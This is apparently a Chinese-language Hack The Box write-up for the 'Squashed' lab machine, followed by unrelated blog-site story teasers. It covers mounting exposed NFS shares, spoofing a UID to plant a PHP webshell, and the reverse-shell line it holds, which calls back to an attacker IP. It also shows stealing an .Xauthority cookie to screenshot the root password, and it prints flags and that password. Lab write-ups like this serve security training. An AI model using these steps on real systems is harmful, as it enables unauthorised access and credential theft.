Squashed HTB Writeup

logo.png

知识点

1、rpcbind协议的利用

2、nfs挂载目录写入webshell

3、keepass和john连用破解密码(虽然没有成功)

4、.Xauthority文件的利用

5、xwd截图

WP

1、直接访问IP,发现是一个家具网站

01.png

常规nmap扫描一波,发现开启了ssh,http和rpcbind协议

02.png

查一下2049端口nfs协议的利用:https://www.cnblogs.com/whitedream-/p/14113230.html

可以看到主要用一下几个命令

showmount --all {ip}
showmount --exports {ip}
mount -t nfs {ip}:{remote_dir} {local_dir}

我们这时候利用下上述命令探测靶机

03.png

我们得到了/home/ross/var/www/html两个目录,这时候我们可以挂载目录到本机

sudo mkdir /mnt/ross_folder && sudo mkdir /mnt/web_folder
mount -t nfs 10.10.11.191:/home/ross /mnt/ross_folder -o nolock
mount -t nfs 10.10.11.191:/var/www/html /mnt/web_folder -o nolock
04.png

web_folder就是web主目录,通过nfswebshell,因为对应目录的uid是2017,我们需要新建一个对应权限的用户

┌──(root192)-[/mnt]
└─# ls -ld web_folder                                             
drwxr-xr-- 5 2017 www-data 4096  3月 6日 22:45 web_folder

# 新建用户
sudo useradd websheller
sudo usermod -u 2017 websheller
su websheller

在web根目录下新建webshell,写入反弹shell,监听反弹shell端口并请求反弹shell文件,获得webshell

<?php system("bash -c 'bash -i &>/dev/tcp/10.10.14.18/1234 <&1'");?>
05.png

成功获得web权限和flag

alex@squashed:/var/www/html$ cat /home/alex/user.txt
cat /home/alex/user.txt
864e4567f548992256f98749ff9005aa

查看用户,发现有两个用户alexross,当前用户是alex

06.png

在ross目录下发现了.Xauthority文件

07.png

关于此文件的简介可以看下面的连接,好像就是关于linux远程桌面的(我自己也不知道这么理解对不对)

https://docs.citrix.com/zh-cn/linux-virtual-delivery-agent/current-release/configure/administration/others/xauthority.html

Linux VDA 支持使用 X11 显示功能(包括 xtermgvim)进行交互式远程处理的环境。此功能提供必需的安全机制以确保 XClient 与 XServer 之间的通信安全。

可以通过两种方法确保此安全通信的权限安全:

  • Xhost。默认情况下,Xhost 仅允许本地主机 XClient 与 XServer 进行通信。如果选择允许远程 XClient 访问 XServer,则必须运行 Xhost 命令授予对特定计算机的权限。或者,也可以使用 xhost + 以允许任意 XClient 连接到 XServer。
  • Xauthority。可以在每个用户的主目录中找到 .Xauthority 文件。它用于将凭据存储在 xauth 使用的 cookie 中以用于对 XServer 进行身份验证。启动 XServer 实例 (Xorg) 后,该 cookie 将用于对与该特定显示的连接进行身份验证。

kali的home目录下上也有这个文件,感兴趣的师傅可以去看看

08.png

我们可以尝试先获取ross的权限再尝试提权到root,通过最初的nfs我们可以访问到ross的根目录,我们在这里找到一个.kdbx后缀的文件,这是keepass密码文件,可以使用john或者hashcat尝试破解

09.png

参考:https://blog.chaos.run/dreams/hashcat-recall-keepass-password/

主要会用到一下几个命令

# 提取 hash
keepass2john keepass.kdbx > keepass.hash

# 开始破解
hashcat -m 13400 -a 0 -w 1 keepass.hash dic2.txt --force

可以看到执行命令之后出现了报错

10.png

网上搜索了一下相关的报错,应该是版本问题。

link: https://miloserdov.org/?p=5191

11.png

我们需要换个思路,利用刚才发现的.Xauthority文件

首先创建一个1001权限的新用户,用来操作文件

13.png

以该用户登陆

14.png
# 复制.Xauthority文件到/tmp目录下
# 将.Xauthority文件传到alex用户的那台机器上
cd /tmp
python3 -m http.server 80

下载.Xauthority文件到靶机/tmp目录下,利用凭证截图

关于xwd截图的参考连接:

https://feichashao.com/xwd-screenshot/

XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/miao.xwd

然后在把文件传回到攻击kali上面,可以直接将miao.xwd文件复制到/var/www/html/目录下,这样我们就可以通过web下载

mv /tmp/miao.xwd /var/www/html

# kali上执行
wget http://10.10.11.191/miao.xwd

# 转换图片为png
convert miao.xwd screenshot.png

查看截图就可以看到密码

12.png
# root密码为 cah$mei7rai9A

0f1f4ec6ad3ac0e2380e57dd0b652e54
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 220,458评论 6 513
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 94,030评论 3 396
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 166,879评论 0 358
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 59,278评论 1 295
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 68,296评论 6 397
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 52,019评论 1 308
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,633评论 3 420
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,541评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 46,068评论 1 319
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,181评论 3 340
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,318评论 1 352
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,991评论 5 347
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,670评论 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,183评论 0 23
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,302评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,655评论 3 375
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,327评论 2 358

推荐阅读更多精彩内容